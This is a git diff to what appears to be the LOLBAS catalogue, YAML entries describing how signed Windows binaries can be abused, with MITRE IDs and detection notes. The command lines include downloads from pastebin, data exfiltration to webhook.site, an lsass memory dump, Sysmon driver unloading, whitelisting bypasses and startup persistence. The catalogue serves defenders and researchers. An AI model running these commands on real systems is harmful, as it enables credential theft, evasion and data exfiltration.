diff --git a/yml/LOLUtilz/OtherBinaries/Upload.yml b/yml/LOLUtilz/OtherBinaries/Upload.yml new file mode 100644 index 0000000..6cfa0a3 --- /dev/null +++ b/yml/LOLUtilz/OtherBinaries/Upload.yml @@ -0,0 +1,18 @@ +--- +Name: Update.exe +Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation. +Author: 'Jesus Galvez' +Created: '2020-11-01' + - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Whatsapp installed +Full_Path: + - Path: '%localappdata%\Whatsapp\Update.exe' +Detection: + - IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process +--- diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml new file mode 100644 index 0000000..2b7c39d --- /dev/null +++ b/yml/OSBinaries/AppInstaller.yml 
@@ -0,0 +1,22 @@ +--- +Name: AppInstaller.exe +Description: Tool used for installation of AppX/MSIX applications on Windows 10 +Author: 'Wade Hickey' +Created: '2020-12-02' +Commands: + - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw + Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1333900137232523264 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +--- diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml new file mode 100644 index 0000000..7cbd821 --- /dev/null +++ b/yml/OSBinaries/Aspnet_Compiler.yml 
@@ -0,0 +1,28 @@ +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. + Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 081f515..19947c2 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -1,6 +1,6 @@ --- Name: Certutil.exe -Description: Windows binary used for handeling certificates +Description: Windows binary used for handling certificates Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index 1d08c32..e82eac4 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml 
@@ -4,7 +4,7 @@ Description: The command-line interpreter in Windows Author: 'Ye Yint Min Thu Htut' Created: 2019-06-26 Commands: - - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat + - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat Description: Add content to an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml new file mode 100644 index 0000000..e5dd633 --- /dev/null +++ b/yml/OSBinaries/DataSvcUtil.yml 
@@ -0,0 +1,30 @@ +--- +Name: DataSvcUtil.exe +Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. +Author: 'Ialle Teixeira' +Created: '01/12/2020' +Commands: + - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile + Description: Upload file, credentials or data exfiltration in general + Usecase: Upload file + Category: Upload + Privileges: User + MitreID: T1567 + MitreLink: https://attack.mitre.org/techniques/T1567/ + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe +Code_Sample: + - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 +Detection: + - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. + - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. + - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil. +Resources: + - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe + - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services + - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services +Acknowledgement: + - Person: Ialle Teixeira + Handle: '@NtSetDefault' +--- diff --git a/yml/OSBinaries/Dllhost.yml b/yml/OSBinaries/Dllhost.yml new file mode 100644 index 0000000..30c9d76 --- /dev/null +++ b/yml/OSBinaries/Dllhost.yml 
@@ -0,0 +1,30 @@ +--- +Name: Dllhost.exe +Description: Used by Windows to DLL Surrogate COM Objects +Author: 'Nasreddine Bencherchali' +Created: '2020-11-07' +Commands: + - Command: dllhost.exe /Processid:{CLSID} + Description: Use dllhost.exe to load a registered or hijacked COM Server payload. + Usecase: Execute a DLL Surrogate COM Object. + Category: Execute + Privileges: User + MitreID: T1546.015 + MitreLink: https://attack.mitre.org/techniques/T1546/015/ + OperatingSystem: Windows 10 (and likely previous versions) +Full_Path: + - Path: C:\Windows\System32\dllhost.exe + - Path: C:\Windows\SysWOW64\dllhost.exe +Code_Sample: +- Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/CyberRaiju/status/1167415118847598594 + - Link: https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08 +Acknowledgement: + - Person: Jai Minton + Handle: '@CyberRaiju' + - Person: Nasreddine Bencherchali + Handle: '@nas_bench' +--- diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index f0a10af..9c4c1b5 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -42,7 +42,7 @@ Full_Path: Code_Sample: - Code: Detection: - - IOC: finstr.exe should normally not be invoked on a client system + - IOC: findstr.exe should normally not be invoked on a client system Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml new file mode 100644 index 0000000..e1167c1 --- /dev/null +++ b/yml/OSBinaries/IMEWDBLD.yml 
@@ -0,0 +1,22 @@ +--- +Name: IMEWDBLD.exe +Description: Microsoft IME Open Extended Dictionary Module +Author: 'Wade Hickey' +Created: '2020-03-05' +Commands: + - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1367493406835040265 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +--- diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index c9d598c..72e185a 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -20,6 +20,14 @@ Commands: MitreID: T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: msbuild.exe project.proj + Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. + Usecase: Execute project file that contains XslTransformation tag parameters + Category: Execute + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe 
@@ -27,8 +35,9 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe -Code_Sample: -- Code: + - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe +Code_Sample: + - Code: Detection: - IOC: Msbuild.exe should not normally be executed on workstations Resources: @@ -36,9 +45,12 @@ Resources: - Link: https://github.com/Cn33liz/MSBuildShell - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191 Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Cn33liz Handle: '@Cneelis' ---- + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml new file mode 100644 index 0000000..55662df --- /dev/null +++ b/yml/OSBinaries/Pnputil.yml @@ -0,0 +1,23 @@ +--- +Name: Pnputil.exe +Description: used for Install drivers. +Author: Hai vaknin (lux) +Created: 25/12/2020 +Commands: + - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf + Description: used for Install drivers + Usecase: add malicious driver. + Category: Execute + Privileges: Administrator + MitreID: T1215 + MitreLink: https://attack.mitre.org/techniques/T1215 + OperatingSystem: Windows 10,7 +Full_Path: + - Path: C:\Windows\system32\pnputil.exe +Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf +Acknowledgement: + - Person: Hai Vaknin(Lux) + Handle: 'LuxNoBulIshit' + - Person: Avihay eldad + Handle: 'aloneliassaf' +--- diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index e2748cf..5b0f5d4 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml 
@@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index 9c00099..964f370 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -19,6 +19,7 @@ Code_Sample: Detection: - IOC: wsreset.exe launching child process other than mmc.exe - IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command + - IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen Resources: - Link: https://www.activecyber.us/activelabs/windows-uac-bypass - Link: https://twitter.com/ihack4falafel/status/1106644790114947073 diff --git a/yml/OSBinaries/fltMC.yml b/yml/OSBinaries/fltMC.yml new file mode 100644 index 0000000..c22696a --- /dev/null +++ b/yml/OSBinaries/fltMC.yml @@ -0,0 +1,26 @@ +--- +Name: fltMC.exe +Description: Filter Manager Control Program used by Windows +Author: 'John Lambert' +Created: '2021-09-18' +Commands: + - Command: fltMC.exe unload SysmonDrv + Description: Unloads a driver used by security agents + Usecase: Defense evasion + Category: ADS + Privileges: Admin + MitreID: T1562 + MitreLink: https://attack.mitre.org/techniques/T1562/002/ + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\fltMC.exe +Code_Sample: +- Code: +Detection: + - IOC: 4688 events with fltMC.exe +Resources: + - Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon +Acknowledgement: + - Person: Carlos Perez + Handle: '@Carlos_Perez' +--- 
diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml new file mode 100644 index 0000000..81e37cd --- /dev/null +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -0,0 +1,26 @@ +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1059.001 + MitreLink: https://attack.mitre.org/techniques/T1059/001/ + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml new file mode 100644 index 0000000..8f92417 --- /dev/null +++ b/yml/OSScripts/UtilityFunctions.yml 
@@ -0,0 +1,26 @@ +--- +Name: UtilityFunctions.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1059.001 + MitreLink: https://attack.mitre.org/techniques/T1059/001/ + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/nickvangilder/status/1441003666274668546 +Acknowledgement: + - Person: Nick VanGilder + Handle: '@nickvangilder' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml new file mode 100644 index 0000000..9857834 --- /dev/null +++ b/yml/OtherMSBinaries/Adplus.yml @@ -0,0 +1,27 @@ +--- +Name: adplus.exe +Description: Debugging tool included with Windows Debugging Tools +Author: mr.d0x +Created: 1/9/2021 +Commands: + - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet + Description: Creates a memory dump of the lsass process + Usecase: Create memory dump and parse it offline + Category: Dump + Privileges: SYSTEM + MitreID: T1003 + MitreLink: https://attack.mitre.org/techniques/T1003/ + OperatingSystem: All Windows +Full_Path: + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/ +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' +--- 
diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index db03291..8b1004b 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -12,6 +12,16 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows + - Command: | + cdb.exe -pd -pn + .shell + Description: Attaching to any process and executing shell commands + Usecase: Run a shell command under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe @@ -23,7 +33,12 @@ Resources: - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda -Acknowledgement: + - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/ +Acknoledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- + - Person: mr.d0x + Handle: '@mrd0x' + - Person: Spooky Sec + Handle: '@sec_spooky' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml new file mode 100644 index 0000000..66f55f7 --- /dev/null +++ b/yml/OtherMSBinaries/Fsi.yml 
@@ -0,0 +1,38 @@ +--- +Name: Fsi.exe +Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml new file mode 100644 index 0000000..855f7d7 --- /dev/null +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml 
@@ -0,0 +1,36 @@ +--- +Name: FsiAnyCpu.exe +Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsianycpu.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsianycpu.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml new file mode 100644 index 0000000..8e7a935 --- /dev/null +++ b/yml/OtherMSBinaries/Remote.yml 
@@ -0,0 +1,43 @@ +--- +Name: Remote.exe +Description: Debugging tool included with Windows Debugging Tools +Author: mr.d0x +Created: 1/6/2021 +Commands: + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: AWL Bypass + Privileges: User + MitreID: + MitreLink: + OperatingSystem: + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: + - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere + Description: Run a remote file + Usecase: Executing a remote binary without saving file to disk + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: +Full_Path: + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe +Code_Sample: + - Code: +Detection: + - IOC: remote.exe spawned +Resources: + - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' +--- diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index 49809c5..0a022cf 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml 
@@ -92,6 +92,22 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --createShortcut=payload.exe -l=Startup + Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1547 + MitreLink: https://attack.mitre.org/techniques/T1547/001/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --removeShortcut=payload.exe -l=Startup + Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1070 + MitreLink: https://attack.mitre.org/techniques/T1070/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed Full_Path: - Path: '%localappdata%\Microsoft\Teams\update.exe' Code_Sample: @@ -114,4 +130,5 @@ Acknowledgement: Handle: '@MrUn1k0d3r' - Person: Adam Handle: '@Hexacorn' + - Person: Jesus Galvez --- diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml new file mode 100644 index 0000000..33d36a5 --- /dev/null +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml 
@@ -0,0 +1,26 @@ +--- +Name: VSIISExeLauncher.exe +Description: Binary will execute specified binary. Part of VS/VScode installation. +Author: 'timwhite' +Created: '2021-09-24' +Commands: + - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here" + Description: The above binary will execute other binary. + Usecase: Execute any binary with given arguments. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 and up with VS/VScode installed +Full_Path: + - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' +Code_Sample: + - Code: +Detection: + - IOC: VSIISExeLauncher.exe spawned an unknown process +Resources: + - Link: https://github.com/timwhitez +Acknowledgement: + - Person: timwhite + Handle: +--- diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml new file mode 100644 index 0000000..dafea55 --- /dev/null +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml 
@@ -0,0 +1,31 @@ +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml new file mode 100644 index 0000000..8542015 --- /dev/null +++ b/yml/OtherMSBinaries/Wfc.yml 
@@ -0,0 +1,28 @@ +--- +Name: Wfc.exe +Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: wfc.exe c:\path\to\test.xoml + Description: Execute arbitrary C# code embedded in a XOML file. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe +Code_Sample: + - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index 86ac6a0..e1625d2 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml @@ -13,6 +13,7 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1105 OperatingSystem: Windows Full_Path: + - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe - Path: 